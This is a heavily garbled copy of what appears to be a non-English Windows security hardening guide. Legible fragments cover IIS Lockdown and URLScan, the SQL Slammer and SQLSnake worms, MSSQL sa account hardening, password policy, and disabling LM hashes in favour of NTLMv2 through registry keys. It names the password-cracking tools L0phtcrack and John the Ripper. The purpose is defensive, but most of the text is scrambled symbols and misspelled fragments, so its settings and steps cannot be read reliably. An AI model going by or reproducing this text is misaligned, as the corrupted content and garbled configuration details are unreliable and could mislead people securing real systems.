. com/technet/security/tools/locktool.asphttp://www.microsoft ' 3 I SL " 7 : Expert u? "7 u?# S ) Custom 1/ l' F IIS SL 2, 0 5 d * ^P 6 'IIS a ?@ F) 5< I N ] WebDAV ? 5 TG' g • b. # _,< Printer, ism. a I ] ) X g < " $O) . 6ISAPI extensions ? 5 TG' g • _Idq, htr IIS - 56 -,< K b C 5! T) , 5 7 - 3 ) Code Blue HTTP 0, < 6, " ? URLScan ? @ A" 4 " % PH K6 ) cmd.exe 7< D 7# ! I IIS R4 S @ ^ 6 3 I] 1 ) K LLS Lockdown. . 6 :! bP 785/ " 7 L * 2 ` A R4 (,! ;! 
&) - 5 l ' " ,G 6, " Code Red 85/] , 5 5 - Y , #4 0, < -, 6 U ) http://www.microsoft ah @ " 0 - Y ?5F 7C $ URLSean B'0_Buffer Ovrflow \ " 3 + • Z&F " O) -, 6 U ) 0_tftp. 2HTTP 0 1 5 MR/ • 6 N b ?@ ? ' & com/technet/security/tools/locktool.asp R4 S @ : 2 ) Microsoft SQL Server (MSSQL) _MSSQL] ' ) # , F R 4 S @ : 2, - 9 *5 ) !89 3 0, 5 7 . 6 ' ? 5F 2#5 & -, 6 U ) 3 M, 6 F / 7 !89 i. R4 S @ ^ -, < = ' ?# SQL ? , 6 U ) b ? & MSSQL ( 5! W 3 F - Y u $h SQL -, 6 U ) , 7 / 23 , # 4 (, ! % 1 , )W 3 0, HS @), , e 6=GX " ! ?@)- G ?5F SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida ( ) 0, 5 ) - Y MSSQL -, < 3 < =GX ^ 3 ?1 ( E l ' R4 S @ : 2' , F F E F) Tu<] , 6( : - " _pqqs ) pqqp T ] - 785/ 6 1 @A I 0_T " -,< TG'] SQLSnade/ Spida ( b. , 6h @ ) + : , - 1 @ ? & 0, 6 #P < ' $ R4 S @ ' a 5 - Y aMay 2002] l ' 6( j &' Kc ,/ B5# 7 !89 ? " 7, 6 4" " ? K c $l ' B5# 7 !89 • http: //isc. Incidents. Org/ ang lysis. Html? Id= 157 • http: //www.eeye. com/ html/ Research/ Advisories/ AL20020522. Html. • http: //www.cert. org/ incident- notes/IN-2002-04. Html. T G'] SQL-Slammer/SQL-Hell/Sapphire ( : B5# 7 !89 aJanuary 2003 v • http: //isc. Incidents. Org/ analysis. Html? =157 • http: //www.nextgenss. com/ advisories/ mssql-udp. Txt • http: //www.eeye. AL20030125. Html com/ html/ Research/flash/ -,< • http: //www.cert. org/advisories/ CA-2003-04. Html ) wxss 4 Internet Storm Center b 67 K67 4 B 5F " _MSSQL -, 6 U ) ,< 0 , #4 " ? 59 T L/ 0, 2 0 I5 F DY/ , ( , H ? @ ? 5 T G' g sa Account " ? 6 " ) h, / - P 6) ( E : " %# T 0, 5 " # 6 2< ) U) ) 6 $l '( % N 4$ gatway \ ' A) 2 # N 7 UDP ^ 0_-,< - < 7 4 ' L /] , < %# H wxsx 7 bP #4 4y !89 F 3 H, , e G ) I Z F MSDE ? @ ) \X !89 ? ,6 Patching 6j 4 7 L z) 3 ) ) ) -" F] _ SQL -, 6 U ) 6 F SQL bP MSDE 2000, Microsoft Server 2000 Deskrop Engine ,G 0 ' !89 1 @),, e G ("c 7 ,H 5 B') 6 #B 5! 5 l ' GH ) h 0 ' ,6 3 , -, < K 7 , 3& @,, 0 [ I5 ) -,< N wxsx 7 4 5 0, 5 ' Resolution Service Overflow Stack Buffer \ 2 ), < ? 
SQL Slammer ( 2 6 & 3 account ?@ " h "?& R4 S @ ,L K6U ) I SF l 'Buffer Overflow 0 ( ,H ( " : Sa Account 0 5 P !& Buffer Overflow _% 5/] A bP B5# 7 !89 - . _0 < 5 - Y SQL/MSDE Z F SQL Server .. 0 < 5 - Y I -, ` 4 P !& account ^ K7 L #B 5! - . Null _,< - Y Chang the SQL Sevr Admininistror Login h @ ?@ d * b SQLSnake ( N , ) 67 4] wxsx 25F , account ("c : " # e 'j 4 H _ '#< - N] sa account] e 'j 4 0 -, < K A & h #P < 6 #B 5! "] SQL Lite Server ? G ? 2 P / ?P / " " -, < S L Server SQL " * ) 6 @, < ) 7c L. - 56 Z&F " ? @) # ? G MSDE 2000 0, , P a • *< SL " SQL/ MSDE Server 2000 (Developer, Sradard and Enterprise Editions) • Visral Studio. NET (Architect, Developer and professional Editions) • ASP. NET Web Matrix Tool • Office XP • Access 2002 • Visral Fox Pro 7.0/8.0 0, 5 , -Y , 6 3 SQL/MSDE -, 6 U ) #40 = B* 6A) " - Y 8Q 0 < C A " - Y $? , H? , _TCP 7 0_ F) & -, < - < wxsx 7 wxss 7 4 / 9 -, - 0, TL 4 $pqqq MSDE F UDP &1 # ?), # Overflow Buffer ^ 4 U) 60 ? , d* ") GX) $, < , 6 3 ( E UDP h 6 ;! $,< )- %L ?@ UDP U) ^ 0 $-, 6 U ) -, < ? , X02 0, < " * A) " I ' ,6 3A wxsx 7 4 ) !89 K6 $ ( 4 #4 NAMED PIPES ) l '7 4 0 3 l ' , 6" - Y ? # ] , ? ! l '7 6 L ? ? , #) ) TL - . T !89 $ ( E 4" - Y pqqqMSDE !89 56MSDE ) SQL -, 6 U ) y 6567 # b & ?@ N? 4] Session NetBIOS 4 xxr|ws{ 7 ^ ,K U) # R4 S @ ^ ( E U) TCP U) 6? G MSDE " l ' 6 &'( !89 !89 3 : F) -, 6 U ) \ 2 " 785/ 6, " # ?@ F pqqqMSDE ' 6-" Z F System Local ,L account ^ , 4 # " I ' ] 0,< ,6 3 ) User Domain $ F 6- Y/ " & @ 0,6 ,L Overflow Buffer ) - Y ,L , , j6 F ("c 5 $ nH Critical Update a I ! ' R4 S @ 7 K &F &1 @ ) K <@ ' - Y _, H , , ) - 9* e G 6& " - Y ) ' 0 5 ( N6 [ 0 5 - Y Incidents.org h @ " ? - Y $, 5 ? @- 6% '7 "), ) Microfoft SQL /MSDE Desktop Engine " ,F 7 0,< ,6 3 N : ) 8 ( 6& " h @n ^ 0 1 !" 6* " 6 6) , < -, < SL 2000 &'( HS @),, 2 e G 2 l' ) pqqq SQL/MSDE Server7.0 !" K K Kit Microsoft SQL $ SQL/MSDE 56 - Y - Y $, 5 0, 5 2 +. / SQL/MSDE Server, F , # 4 ) Patching " 5 % < 6 #P < ) Domain ( 5 ? 
6 ^ " SQL Slammer # , # 4 ) Patching " 5 nH 3) l ' F $, 5 - Y MSDE 2000 0 &'( )3 45 678 ! 5E ') # < 9" ? http://www.microsoft.com/sql/downloads/securitytools.asp ? @ SQL Critical Update Kit $-,< K Toolkit 0 5 , 4 6 & % < ) -,< -, & SqlSecurity.com 0 SQL Critical Update ) SQL Scan !89 - K 5 $, 6 $l ' & 0 )? & A ^ UDP1434 7 4 wxsx 7 SQL Pingv2.2 ( 4 _X02 SQL ? , 6 U ) & : 2 UDP , ] 0, 5 I T Subnet ) * - 5< I SQL Scan Microsoft 0 ^P !89 ) - l ' &'( #B 5! 0, 5 2 &'( )$,% TP "7 B 5! $l ' R4 S @ : % ("c v 4 ?@ (8! % 6 9 9:; 678 DY/ I a K5 KHIJI UDP G 7E ' SQL/MSDE Monitor Service D 7E # E / EF • -, < K 6 S @ : ) BH " - Y ) SL MSDE 2000 ?), ) ) - " ) - Y UDP n 9 " F User & @ b ) %L 6 O* 'L 7 T ( ,H $ )- #P< #P< ) 6-" 1 @ " U4 F SB #P < ) ^ account 2#5 F &1 e G O* 'L 7 R4 N`6 0 <; ! ) Domain 6- Y/ " 0,6 UDP 1434 7 4 ,L 0, 5 6 0, 5 T s}~ IP !89 6h @ 0 ? 5 TG' g ] Dos \ " F _U ) 7 B 5! MSDE SQL/MSDE 6 1 M SQL/MSDE -, 6 U ) F 4 # " I' ' $l '( ' " MB/Sec - E 4 " j - 1 @ 2< 0 ,K 3 I F I Ms-SQL/MSDE Slammer ( !89 Multicast \ " $, n . $W , $ ,L s}~ % < , 6 3 j &' -, 6 U ) FSystem Local ' - Y $, 3(E Buffer Overflow , MSDE2000 H , , ) - 9* e G $ $l ' 0 5 SQL Pack 3a Server 2000 - 56 F ' n 9" ( ,H ? ( E ?# C 85! ) W L 3 0 : $-,< P [ 7< & h 0,< ,6 3 3 #P < Pack Service * <)0 L @ • Pack Service 6* 2 3@ K2000 a" , SQL/MSDE Server 7.0 Service Pack 4 Pack 3a MSDE/SQL Server 2000 Service P ! K Pack Service * E <) M E '6E = $> Patch * <)0 L @ U) 6* b 5 -, < K 6Patch 2 3@ " -,< K - Y " 6h @ " ? I SQL/MSDE/MSDE -, 6 21 " ? F Patch 2 3@ SL " ? 59 a 6@ I 0 5 - Y ') # SQL/MSDE -, 6 U ) : SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE Patch * <) M '$A0 $ L N O < 0 1Patch 0 L @ • $> $P7 Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 K E 6E = Patch ? $ Web MS02-061 I 0 -, a 5 - Y K " "2 9 -,< K Patch 2 3@ " 6h @ " ? 6 @ ) ? 
59 SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE I KPack Service * E <) M E '6E = $E > Patch * E <)0 L E @ • -, 6 U ) 6* - Y b ' ) # -, 6 U ) 5 -, < K -, < K 6Patch 2 3@ " 21 " ? SQL/MSDE/MSDE F Patch 2 3@ S L " ? 59 : a - Y " 6 @ I 0 5 SQL/MSDE 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000 (MSDE 2000) MSDE Patch * <) M '$A0 $ L N O < 0 1Patch 0 L @ • $E > Q7 Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 K E 6E = Patch ? $ Web MS02-061 I 0 -, K "2 9 I 0 -, a 5 - Y K " Patch 2 3@ " 6 @ ) ? 59 -,< K Patch 2 3@ " 6 @ ) ? 59 "2 9 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000( MSDE 2000) MSDE C 5! l '? # KAuthentication Logging SQL Server D 7E # E /• Enterprise Manager n 9" ? ?@ ? 5 TG' I 0 TG' g _Server Properties Security ] 785/ 2 1 ), _sa” ( " # K$@RE = !E " sa Account # 0 , F, , e G j * $, < -, < K 7 sa Account P !& ? " - Y E0 3 _blank] $ MSSQL/MSDE SQL/MSDE -,< DY/ P !& ("c 0 < , 63 H Administrator (SA) Login System 2t 5: W L3 ("c ? 59 - Y SQL/MSDE SQL/MSDE -, 6 U ) 0_ *# • P !& 2 ^ - Y l 'account " 9 K 7, 5 4" Server Book Online 6E1 M , account " -, < 3 <] e 'j 4 ^ S,E 5 ( ,H R4 7 ) X ("c /] 0 7 ,H the SQL Server Administrator Login j * ) ' ) # % & $, 5 MSDN / 5 -, < and Change the System Administrator Password by Using ) $ Changing ) , #4 I -,< K 6 ) 7 # 2 3@ " ? MSDE Verify 0 5 - Y $sa Account S M MSSQL/MSDE M E U) 4 : Domain ? 2 ! ] Z F^ B . 7" ) _NT "), ) 6 56 E ; $E E• KSQL/MSDE Server Agent 6E1 . $ SQL/MSDE Server Agent ) -, 6 U ) ] Local System ) E $E EQ7E G E! D E I 7" ] SYSTEM S @e G U) %H , / MSSQL/MSDE account Valid ) administrator domain 0 _XP ) pqqq "), ) 0 ,6 3 #P< ) % T ?# F Z F Domain $ a 4 " : 2 auditing ) Windows NT Authentication ? 5 T G' U) $-, < F 7 #< )& @ MSSQL/MSDEServer 0, K5 T G' ? @ C, E ) = H " , 6( E N 6Login ' ? , U) , #4$? # 0, 5 - Y Authentication NT #P< " g 6- ),. 
F) 3 ) : y B'0 ) ) 7c L W L3 R4 7 W 3 TCP/UDP ;! , ? , 6U) ^ P P 6 ("c 6U ) 4" F 3 67 4" N 4 ( E bP ) MSSQL "E $ SQL/MSDE -, 6 U ) " 67 4 z) 3 ) ) ) ) B 3 ? 5F G5 SQL/MSDE 4 ("c # B' 0 B' G5 ) R4 S @ % y y wxss ) wxsx $, < wxsx ) wxss - Y ^ 1 @)j 0 ^ !89 $ (E 25 " - Y TCP/UDP l ' 67 4 " 6 @ a 5 - Y I " - Microsoft SQL/ MSDE Server 7.0 Security - Microsoft SQL/ MSDE Server 2000 Seurity 6h @ " ? &'( )$,% * 7 Windows Authentiction % G 6 6A) ? 6, ) Q0 b f -, < - ) 6 '-,< d * + " - Y + " - Y DZ 0 N` 6?), ) " U 4 ? 5F ) " )- 6% 6account # - 5 account , N ) = G0 < ( #. " I' H ?@ =GX P !& u -)8! /) + ,6 3 F) 2 3- Y R 0,< ? " H % ! 3\P ? " + P! F) , B 5! $ ) X a P !& < ,K , 75I € P ! & ,H ' ) = GX F 6 1G'( E 6, 4 , 4" 2 1 ), ) 2 5 ,6 3 < 6(& # " - Y ] -,< , K ? + $ 0 - 6 \ ' i: 2 1 ) E -,< 2), S @^ ,K •c $ P ! & ,H ' ) = GX account -, < K : ) -, ,6 3 = 9P ? @" 0 H , F7 , , e G < TP, ,F , , , b SB ' !89 F ) -, < = G U 4 0, < F ) , K " U4 ? @] 0,< _0 2 , K " U4 0 < ,6 3 N 1G' # , " - Y )? 6" E ) 7 " S[ ?@ 0, 6 6 1G'$ , -,< H _7) Y & P P! & ) % ' DY/ I ? ?# ? P! & 2 P ! & 2' - "E 5 $ / C 5 ?@ ?@? 6A) $ !89 6& H -, < - ?@ ) ) T) , P ! + , K " P !& 6& " ? P !& ? " 9 P ! % <& ^P R4 -,< = G Account • S DY/ (, ! • 0-,< = G , account E ?# $ F = GX 6 &'( 0, 5 4 5! , B hashing 5 N1 " -, < & ) ) , \ 2 P - F) 2 , 5 ,H 6& " - Y 0 2 ), 5 0, 5 P !& ? 5 T 0 < X ,K + " S ) ( #. 3 1 ) GP 2 W L3 6& "), ) _hashing 6 *1 E/ F) , K _ " Hash , [ 19 a " N1\ ) 6 F Hash , D " ("c ("c P ! I5 $ P !& DY/ = G 7 L , - 3• P! & message digest] - , <R ?# # b E _ < $hash , -,< 3 < 0_ P! & d • 6 E 0 ?@ -,6 ) - 3•M Y< - Y ? N1] b )d* 7 ) P ! & ,H ') )- / SB g 0 < ,6 3 ?@ h 83 ( 'hash , , Hashe , 6' P ! & Hashing N& ] 3 ) -, < N $-, @ %5G1 P • )% ! 5 "), ) 5 ] LM • NTLM • _ 5 LM] Lan Manager] " LM -, < Hash ^ XP, 2000 , "), ) LM # F 0, 5 " " 7, 5 #< $ F $, < P ! 6& - 3•_ B . 7 P LM , ( #. 6 &' * 7 , H -, %#< 2 , B G' 6 # ) P 5 ] NTLMv2 • ) ) X "), ) B G' 6b. 
Q # e 'j 4 7 L _ < NTLM, ] ' ) # #< - 5/ " , ] NT GX) pqqs "), ) N& T, " - Y _NTLMv2 6& $, 5 ) 7 ,H 1 ), & LANMAN Hashes] = GX S 5 P ! Z# L "), ) P ! 6& /, ) W 3 K6A) " - Y Y6 0,< , 6 3 HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e n-us/security/securiy/h-gly.asp " % c, LM hashes =GX a 0, < 0, < % ,P - $ 13 0, d * &E 7 B 5! Y6 H F P Qf ) , 5 ! 5E ) 2, ) Hashe d * d * & _dictionary- style] P @ hashing LM A ) 2 6 < 0 Lan , K , @ 'SAM Lmhashes " )? , ?@ ) K62< A) % HS %H , / 0, < P !& - "), ) 2 )d * ? H F 6& • Ih / 0, 2 F 6 F - 3• :3 ) , , ,F -)8! 0 ,6 3 e 'j 4 7 L ) SB g Manager # ("c 0 N1" - Y 6- H$ ' R4 -, < S L I 5 hashes LM = GX T , K, @ ' ? ) 6 '_ , ' )n. R4 S @ LM hashes A) " - Y 5! ? P ! K6 < \X - < # 2 6 F K6 < 2 5 ) ,K 5 P ! , ` 4 0,< ,6 3 6 ' P !& U) 5 hash 6& • P !& d * , 6 3 -, < 2 5 > ?@ )- 5 b P ! - H, , e G -, 6 U ) 7 B 5! $, < # 6& • 0, -, < % , P • & M) / Y6% < C ' )- P ! -,< , K / S 5 ,< #< C /8: 6& • _cracking] ),. R 3 ) l '7 B 5! % 5# S P ! hashing , @ ' 6 F 6 ?# S j &'Hash T 9 P Y6j* ) C ' + >'" - Y % ,P• & M) / C 5 0, & ),. !89 5 2 <] +5 l 0 ,6 3 Y , 4 CG:H ) ?# C 85! P! 6& ? )@ GX) , 2 +. / 0, H,, 2 e G !" 0 H F U) )- 5 V & ( #. - Y " 6@ 6 5 , - < %B !)%c " # % / 0 5 - Y 1 ) $, -, ?@ # 2 " E ' B . " ) 0 ' ,6 3 #P< !89 2 C,E ,6 3 S @ e G $,< - 3• B . ) • Bc, # < F) -, 6 U ) ( ,H 62 < " \ 2 2 &'( ) % 5 ) , 5 ,H " : 2 P! & 0, < P ! 6& % E I 5 ("c #B 5! . - Y • 0 " - Y = GX 0 2000. NT "), ) # 4 ) - 5 LM hashes T <% K6 H F P, K , " HS @e G 6" E "2 0 LM -,< P ! & -, 6 - 3• # ) " I ' e 'j 4 7 L Lan Manager hahes I5 ? " b ,< ? , " ("c a , -,< SL e 'j 4 7 L XP, K6 P ! ?5F t6 F) C 8Q ) ("c 5 $ LAN Manager hash ^P # ZF 5 John the Ripper ) _LC44 ] 10phtcrack version " ? " 5 TG' 6Account 6 &'( ?@ 6* 0 &'( )3 45 678 : I 5 6A) 2 P " R 3 ?), 0, "), ) 3? " 6& cracking P ! d * P ! & =GX 0 1 !" ,6 3 E 9:; 678 \ '2 P )2 6%5G1 %5 ) ( #. " ? 59 #. I5 ? @ a 2 7R 0 1T UV" U@8! 4 D #P • P! & 6? ' T /2 ! ' ? "W L3 )S )- 6A) " - Y P ! 
& -, 6 d * A) # F 6 SB g 0 0, 5 ], < 2 " \ 2 0, < _?@ =B* : %5 P ! Y _password] , 5 P ! 6& O* # M /2 1 ) 2' ] ) , " <P?@ ,1 P " P ! M) / % , P ( ,H ?@ _ ("c 2 ? !7 P ! 'L #) h c 9 < )@ ] -,< F " &N F 5B 6 E H? _ 7 - -J) ("c 0 < (E " ) -,< - 1 ) K5 - 3• I ? K6 5 $O 3 & # 2 ? " 2 ), " U4 _ , P4 H& password d * 6& - <& 2 ? ) P 785/ ?, < F H I T \X W 3 - 3•" M,6] ,<P %# I 5 ("c %5G1 $-, < = G ( O %5 P !& " P ("c A" @ ? 3 # / ) KP Y1M) / " ! - 5 MR / 5B ? @d * 6& " O* , M) / P ! % ) 5B ) " )@ M) / ) KP Y1M) / " * 6 " , 6 3 785/ 3? 5F E ) O * W L3 B' ( -,< & %#< " ,G0 )- < 6 ?@ -J ) M) / ) , ! -,< 3 < ( 0 <- N& " - Y ) ,G I5 ) - 5 0,< ,6 3 crack 0, < -,< h PH ),/ P !& " -J ) = G password ) - P A) " <) " ,< -,< 3 < 5B 3 & 7 B 5! $& @ P 785/ P 6%#< % -,< Y ? @ 0, 5 = G N F2 P <" @ 6? " 6& password ( C ' P !& d * N F- 5 S ("c 0 5 crack 2 -, < 3 < • ,G = G - . W L3 Q # # 7 5B -, < & P! & ? (E - Y Hl ' 6 &' * " - Y T#< A" @ ) S 9* & " ) - 3• P ! 6& (8! 6%5G1 T 5! " U 4 " ? P! , 5 ,H 6& Local . I5 2 PF 62 ) " & 2 pqqs $XP $pqqq"), ) 0 6& I 5 "), ) ) 4 " ? 59 6* )- Y Q " 0, < $ ? b 6 " ? & : - Y -,< ? 7 u j &' -,< = G I5 -,6 a 5 TG' Securty Policy Local Security Policy Program Start Pr ograms Ad min istrativeTools Local Security Policy Select: Account Policies, Then password Policy a ? 5 TG' Password must meet complexity requirements $l ' ? " , ` 4 ) ( #. m .1 -, < = G I5 P! F 6 , ! 6& $ 1/ 2 account ( " 0,< * 0,< a,< " ! 5E " -) (&B 0, < a, % 5 ? ?@ " ) = G " U4 ) 3 B P H " P ! (, ! W L3 ? 5 P !& K6 % < P !& _Z A] B N P Y1• & M) / • _z a] B N PY1 q M) / • 6 H ] 6,6 _ %,µ, s/ ,! C 8Q] KP Y1 g , " 5 $ P !& j< %H ,/ " P! & u ) E E )(5 % < _{ U4 • Policy Local Security " 75 I 4(H • • 6 SB g apassword history (range: 0-24 Enforce) B P H P! & ?56C,E $ 3 5 d* 6& " - Y ? "E ? ("c ? 59 #P< ? , $S P !& " - Y v $l ' Z> " " - Y 0, 5 - Y $, ,F -,< = G P ! & 2, 2 , 0, < , ,F GX) \X ,N 2 ) - )@ I 0,< , ? b < TP, , # 4 " U4 B '8 P ! #P < 6& P! 
& $ Y 5 $ P !& `* d* , $") S / 0_, 5 $") S / , 2' P !& P !& I _ u _ P! ] 5! Q , / P !& 3 P !& u H B 'c ,< ,6 3 minimum password age , # 4 0,< maximum " N m.1& password history u 5 ,H ) M , 6 -, P !& P! # P !& 0 ? , (&B LOG on 7 B 5! $? : F) ?), 0, < -, < P ! 5 " - ), . " U4 ) = G _, 5 # &1$,< minimum " 0, 5 #P< F) ? , ,F F) ? , ,F P ! e 'j 4 $Characters Minimum password length 0-14 T 9 %H ,/ ] , 5 - , b , password history 0 _ P! & 3 S d* Y password history % 1 2 , 0 < ,6 * , G %H , / $l ' ,P " 6 O * password History % 1 2, 0 < ,6 * , 6& -, ("c ) - P ? " P! & _ u] = G O* <( E 6 '? @ ? " 7, ?,< 5 , 6& " , E - Y ? # ) -, < 2 ƒ e 'j 4 )(E Y " j password age minimum , -, < = G ,< H? l '? " 7, ] L * I _ P! ] )F $ Y I P !& 0 Days Minimum password age (range:0-999) ‚, < , 6 3 d* 2' Minimum password age 0, 6 ) [ (&B -" F ? & )" " , u # " % PH ] , 5 ) YB* F) minimum password age < # " %P H ] 0, 5 - P - Y Maximum password age (range:0-999 days) 5! Q , / $l ' $l ' 5K ) 5 GX) u ?# 0,< 5! P !& 2 d* P !& P! & = G T 9 %H , / : ("c 2 ? T 9 %H , / 0 # MR / P !& 0, < ? " 0 ' I F) 7 ) X $ Y 6 " 6 , ? 0, - 4 : 2 , - ") , W L3 )S 0 ' $ P! & F) 'Y< ) d * : , $ #P< 7 !89 6? " 2 " 3 In the domain Store password using reversible encryption for all N& " - Y P! & " K6 ? , K , @ '( E N& W L3 " ("c 6& P !& ] 6 7 $-, < DY/ 0 P! & 6 @ I - 3•0 15G P! l' P !& " - 3•$ ) ) K6%# ) 4 -, < K & $, 5 6& $, 5 - Y - Y ?, < T G'2 " - Y 0 users $l ' 2 " 4 ? 5 m .1 d* 5/ 7 # $ : I P ! 2 7 , 5 ) ) 0_ I - 3• ( &1 I ,G 0 6& " 6 P ) " %51 E I ?@ " ? K6A) " 6account " F$ 5 - Y ? R4 # 6 -, `4 a P ! b3 n 9 from Command line Promp: Net User Username/random 6) 56] -, ` 4 ) ' L I P ! P !& 6& - Y 6 P GH ) ? & cracking ("c _ P ! P ! ) -, < I5 S ^P 6 6& F$ P ! , @ '" , < ? , " ("c " E S ("c " E S 6& $l '%5G1 P account _T 9 # $l 'A) 0 < 5 )6& *] - j 5 .Y Service accounts Y &5 - <\ X 6 ^P A) 2 Stand alone ?), " U 4 0 < - Y cracking • F " GX) 2 0 P ! C, E 5 $? " ) l '7 B 5! crack ? @ $ ?@ P! ) -, $ 6& 0 ? @ \8 9 H?@ 3 I N ? 
" (, ! 0, < 3 ?# -, < - 3•?@ SB g 0 <- ) C 3 0 <I $? b DY/ : ? @ DY/ (,! 7 ? K6% ' I ' DY/ ) ,< A" @ ? 3 = GX $ K6( 4 2 ` < $ ) [ >/ ?@ " , < )W 3 ("c ) P ! ) 6& -, < % L , Y 5! ( 5 -, ("c 2 K ("c 6account F $, 5 6A" @ ? (E MR/ !A • 2 1E 0 6 N4 0 ^P 5 6 $ 5 - Y 6account &5 ) : , P account ) 0 2 F ? , KE 1account #!" #P< ) 0, < 4 ' 0 K B 5F " $, P !& " %P H)S E $6 ) H 6 F) ? N ,< P !& 3 ("c P !" “ and must be changed Your password has expired O* $, < H,, e G A" @ P! & 2 < (,! $ N 6& ,K E 9:; • 0 ' ,6 3 B . P ! v 4 6%5G1 / K @8!E " 7E R 0E 1T $? 6& crack ("c "] $ P P! ?@ ?, 6& & $_ E 6 % < P! I l '7 B 5! $ O * - . W L3 6& F ) \ X P !& P! F ( E -,< DY/ 2< ( E -,< DY/ 2 < -,< +H ) F $ 6 0 K6A) " - Y $= GX , 5 ,H ) #. %5G1 6& . 7 $S 0 ? P! craking P !& B 1 I K6 & N : ^P 6account ? )&' I 1 -,< , K ) " - 4 $,< W 3 K62 ) 5 ?@" - Y 0 ?@ ? (N " K6account MR/ ) ) X 3 "% , ?@ , P4 ' account MR/ I %L 0 S , N) )% ! b - Y & $ F P 4 -,< K -, < K 3 - Y $, - 5 V I : 1 7 # " - Y 2 P$ % / ? 59 62 ) " ? " # 54 ? R!5' 0 +W • K 7R T 6 „ 1 # 2 3@ 56 1 P! 0 )? 3 - -)8! ? $ P! & 6 & " $ #P < 6U ) P !& , N $S 2, 0 0 lan &N F 6, & 2 LM E> D 7E # / F• K$@RE = _Version2] Ntlmv2 NT LAN Manager A) " - Y Manager 0 $, K I ,6 3 6(& # P ) I #. N& " - Y E , B $ " T),F a,6 ? $, 5 T - 5 M 9 $NTMV2 v 4 |j1 LM pqqq ) NT "), ) 6=G l ' BH Rgistry key Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControl Set\Control\LSA Value: LMCompatibilityLevel ValidRange: 0-5 Default :0 f4 Y 2 , , )d* , K A) ) \ $l ' Q 4 • a,< 7 # " & 6$NTLM ) LM A) h v 4T 0 < 5 - Y NTMv2 NTLMV2 7 # " - Y NTLM , K A) h T …p NTMV2 , K A) h T …s LM , K ;! DC …x ) -,< NTLM ) LM , K ;! DC …r 0 ' R4 NTLMv2 , K C ' …w 0 - Y ? 0 5 lan Manager , K i: 6 pqqq "), ) LAN ^P 0, #4 75 I , #4 ("c : $ Manager authentication level security: Network I ) SP4NT "), ) $ 6 -, < S L ?@ " , G ) ? , U) LM hashes T " 5 ("c 2 5 ,H ? , U) NT Lan ? E 4 , 2 6& " - Y 7 ? 
I K6 $ NTLMv2 , 5 # ‡ NTLM " - Y : # $, < f4 , Controllers Domain I $l 'U ) 0_ #P < ) (&B P LM I BH " - Y ) Y _ {† "), ) hashing 0 5 T5! Domain Controller 0 ' 6 SL " U4 0 0, < $ 5 NTLMv2 " - Y u? ) 6 , 5 - Y Network Client Microsoft - 56 $, 5 ? O* S l ' N 4] ' LMCompatibility ( , ) Directory Services Client ?@ ) (5 NTMv2 " {† ) {r "), ) e 'j 4 7 I 2 ) $ Manager authentication Level LAN 0, ) ( ,H ? @ " Security Options ) Policies Local O* S pqqs ) XP "), ) ) , I ) T G'Policy Local Security & • # & XP ) pqqs $pqqq "), ) -,< K SL , , ) {r "), )] : I Manager,version LMCompatibility Level authentication level Manager ("c 0 ' U) Send NTLMv2 Respone only\Refuse LM I ) ), . T 5! $ : MR / ^ P B %K & 2 ? @ " - LM hashes E ? 5 TG' g 1 )- -, < SL ? @ ) (E 2 l '7 B 5! T $ " ) ,< ,6 * Value on next 0 ? , /# • LM hashes & # ') # C ' F) ?@ " - Y XP ) pqqs $ _ -, < E l ', B Windows 2000 Domain Controller ) 5 - 3•& LAN - < # 2 6 E , B0 I 3•$ #P< I ) SP2] 2000 "), ) ,G 25 # KLmhash 0 E 6 E<X " ) SAM 0 ?# Local Security Poclicy , # 0,6 $Lanman hashes $,< E $Xp ) pqqs "), ) & ? 5 T G' ? 0 password change Lan manager hash network security: Do not store ("c : 2 ) Local Policies 6 $l '7 - < hash LM " 0 ' # 2 # " I M ,6 ) T G'Policy Local Security & u T5! " U4 0, O* S Security Options ("c 0, < +H ) [ $-, < E 7 u -,< " , - , ,F hashes LM E W L3 P !& - 3• : ) ("c Y7 N 4C ' $-,< K 6A) F LM hashes ) 0,< , 6 3 MR/ $,6 Rgistry key Hive: Hkey_local_Machine Key: System\Current ControlSet\Control\LSA\NolMHash (E u 3 6 & KSAM ? E EZP 0 E E 1[E E 6A) " hashes " P ! Hash E EY@ 6& ? )@ , E E /# • 0 WE E 5' $ P ! & cracking I a, 5 4 " I 2 , a #P< " P ! - Y 6& = a 2 ] #P< F M, 6 - Y ethereal 0_ 0-,< ˆK 6 #P< " - Y #P < 67 MR/ ) d * I , 1' pqqq ) NT4 "), ) b < ,6 3 % '" - Y _ C:\Winnt\System32\ Config F) ?@ Q# ?# "C ' SAM % '0,< -,< " , - ? 0 )@ - 56) ), . Controllers Domain C L3 @ 78# 3 I & Repair F ) Lock "), ) N % ! , & 9 i: j &') SAM % ' Q # " ("c : l '% '0SAM % ' Q # $l '% '0,< 2< 6& " ? 5!] 
SystemRoot%\System32\Config C % ! 3 N 4 6 Backup I # &' ) -,< ' Backup 7 !89 " 0 a 5 - Y " 7c " ? B5# 7 !89 R3 - How to Disable LM Authentication on Windows NT - How to Enable NTLMv2 Authentication for Windows 95/98/2000/NT - New Registry Key to Remove LM Hashes from Active Directory and Security Account Manager E &'( )$,% * +\ Internet Explorer (IE) 0 ' ) # ?@ "), ) ( '784 N ( N ) Patch 5 $, R4S @^ h IE ? 6T R4 S @ ^ 0 T#< ") 85/ , 6 ) B . % $ 6 K6 * ,6 3 " 5 IE ) ,G F) "), ) ) K6 6 ) SB g " - Y 7 ) X, < 0 ) SL & !" 2 , ,F ) 2 3@ " 6) 0 < ,6 3 -,6 ) IE W F) IE < L3 ("c Windows U ) 6 4 F) ' R4 S @ ^ - Y "), ) ') # 6 &'( / $IE ) , F) ?, 5 ) 0 < ?@ # 6Patch SL Update Windows U ) # http://windowsupdate.microsoft.com/ ? 0 ( E " ) HFNetChk " ? , 0 &'( )3 45 678 $, < -, ) # Analyzer Microsoft F Online ) HS @), , e G , < T G' 0 5 F) $, 5 C 5! ) SL ,6U ) $U# 0 1 !" -, < - < 